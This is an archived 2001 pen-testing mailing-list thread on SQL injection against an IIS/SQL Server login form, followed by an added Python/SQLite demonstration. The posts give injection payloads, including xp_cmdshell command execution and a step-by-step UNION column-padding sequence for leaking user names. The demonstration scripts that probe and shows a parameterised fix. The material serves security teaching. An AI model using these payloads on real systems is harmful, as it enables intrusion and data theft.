RE: SQL

From: rudi carell (rudicarell@hotmail.com)
Date: 11/22/01


From: "rudi carell" <rudicarell@hotmail.com>
To: Andy.Miller@insight.co.uk, jfernandez@germinus.com, garyo@sec-1.com, PEN-TEST@securityfocus.com
Subject: RE: SQL
Date: Thu, 22 Nov 2001 07:55:35 
Message-ID: <F231fC65FE3TiZij3Ht0000ec2e@hotmail.com>


Andrew said:
>Don't you need the returned recordset to be written to the html stream in
>order to see anything useful? For instance if you are just looking at a
>login page you may not get any joy with appending extra SELECTs? We have
>just been playing with exactly this!
>
>Andrew Miller

.. yes,

but .. the first thing is .. there is no need for html-output when you can
execute system-commands (xp_cmdshell..,sp_adduser etc ....)

and

htmloutput can be achieved by

a) using aliases (AS)
b) brute-force the column(s) you can see within output using "UNION"

HowTo:

1) guess the number of columns from table A by column padding (see example)
2) find the right column number within the query (see example)
3) if necessary, typecast columns

example:

---cut here---
sequence I

[original] union select '1' from sysusers;--
[original] union select '1','1' from sysusers;--
[original] union select '1','1','1' from sysusers;--
[original] union select '1','1','1','1' from sysusers;--

after no error message
sequence II

[original] union select name,'1','1','1' from sysusers;--
[original] union select '1',name,'1','1' from sysusers;--
[original] union select '1','1',name,'1' from sysusers;--

.. until name appears within html .... tataa
---cut here---

nice day,

rc

security@freefly.com
http://www.freefly.com/security/

>You might (90% chance) have a possibility to
>
>a) alter the database
>b) execute remote commands in the SQL server
>
>This is a common error (not quoting quotes :), this is due to the SQL
>statement being executed in the IIS server (through an ODBC connection)
>simply having the information given by the user appended to it.
>
>Thus:
>
>SELECT * from test where value='$user'
>
>if user=' becomes:
>
>SELECT * from test where value='''
>
>which generates your error.
>
>However, you can do the following
>if user=test'; select * from test -- becomes:
>
>SELECT * from test where value='test'; select * from test -- '
>
>which is a valid SQL statement (two as a matter of fact) and
>if user=test'; exec master..xp_cmdshell 'dir' -- becomes:
>
>SELECT * from test where value='test'; exec master..xp_cmdshell 'dir' --
>
>
>which will run the 'dir' command in the SQL server (not in the IIS!)
>This is fun
>since, in some cases, the IIS server is in a DMZ and the SQL server is
>in the internal
>LAN or behind another firewall, like this:
>
>Internet ----- Fw -------- Fw --------- Local network
>               |           |
>              IIS       SQL server
>
>or
>
>Internet ----- Fw -------- Local network
>               |                |
>              IIS           SQL server
>
>
>So you might be one step closer to your target !
>
>Some references (fresh out from google):
>http://www.sqlsecurity.com/faq-inj.asp
>http://www.silksoft.co.za/data/sqlinjectionattack.htm
>
> Regards
>
>
> Javier Fernández-Sanguino Peña
>
> >
> > Hello all,
> >
> >
> > I am doing a pen test against an IIS 5 web server. The web server
> > requires a user name and password via a logon form. If a single quote
> > character is entered (username) the following error is produced
> >
> > [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
> > before the character string '' and password=''.
> >
> > I remember reading somewhere that this can be used to gain
> > further access,
> > but I can't find the info.
> >
> > Can anyone help?
> >
> > Thanks in advance.
> >
> > Gary
> >
> >
> > --------------------------------------------------------------
> > --------------
> > This list is provided by the SecurityFocus Security
> > Intelligence Alert (SIA)
> > Service. For more information on SecurityFocus' SIA service which
> > automatically alerts you to the latest security
> > vulnerabilities please see:
> > https://alerts.securityfocus.com/
> >
>


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
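A worked version of the concatenation bug and the UNION column-padding sequence from this thread, as an added example rather than code from any of the posts: it uses SQLite from Python in place of SQL Server/ODBC, and the table layout and row values are constructed assumptions.

```python
import sqlite3

# Constructed stand-ins for the thread's "test" table and SQL Server's
# sysusers catalogue (assumption: 4 columns, illustrative row values).
SCHEMA = """
CREATE TABLE test (value TEXT, password TEXT, col3 TEXT, col4 TEXT);
CREATE TABLE sysusers (name TEXT);
INSERT INTO test VALUES ('alice', 's3cret', 'c3', 'c4');
INSERT INTO sysusers VALUES ('dbo'), ('guest');
"""

def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con

def lookup_vulnerable(con, user):
    # The pattern from the thread: SELECT * from test where value='$user'
    return con.execute("SELECT * FROM test WHERE value='" + user + "'").fetchall()

def lookup_parameterised(con, user):
    # Same query with a bound parameter: quotes inside 'user' stay data.
    return con.execute("SELECT * FROM test WHERE value=?", (user,)).fetchall()

def raises_sql_error(fn, con, user):
    # True when the engine rejects the statement (the "Unclosed quotation
    # mark" symptom from the original question, in SQLite's wording).
    try:
        fn(con, user)
        return False
    except sqlite3.OperationalError:
        return True

def union_column_probe(max_cols=8):
    """Sequence I from rc's post: pad UNION SELECT with '1' literals until
    the column counts match. Returns the discovered count, or None."""
    for n in range(1, max_cols + 1):
        payload = "x' UNION SELECT " + ",".join(["'1'"] * n) + " FROM sysusers--"
        if not raises_sql_error(lookup_vulnerable, fresh_db(), payload):
            return n
    return None

def union_leak(ncols, position):
    """Sequence II: put sysusers.name into one slot of the padded UNION so
    its values ride along in the result set of the vulnerable query."""
    cols = ["'1'"] * ncols
    cols[position] = "name"
    payload = "x' UNION SELECT " + ",".join(cols) + " FROM sysusers--"
    return lookup_vulnerable(fresh_db(), payload)
```

The parameterised lookup returns nothing for the same payloads, which is the fix; the stacked-statement case (xp_cmdshell) is not reproducible here because sqlite3's execute() runs a single statement.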


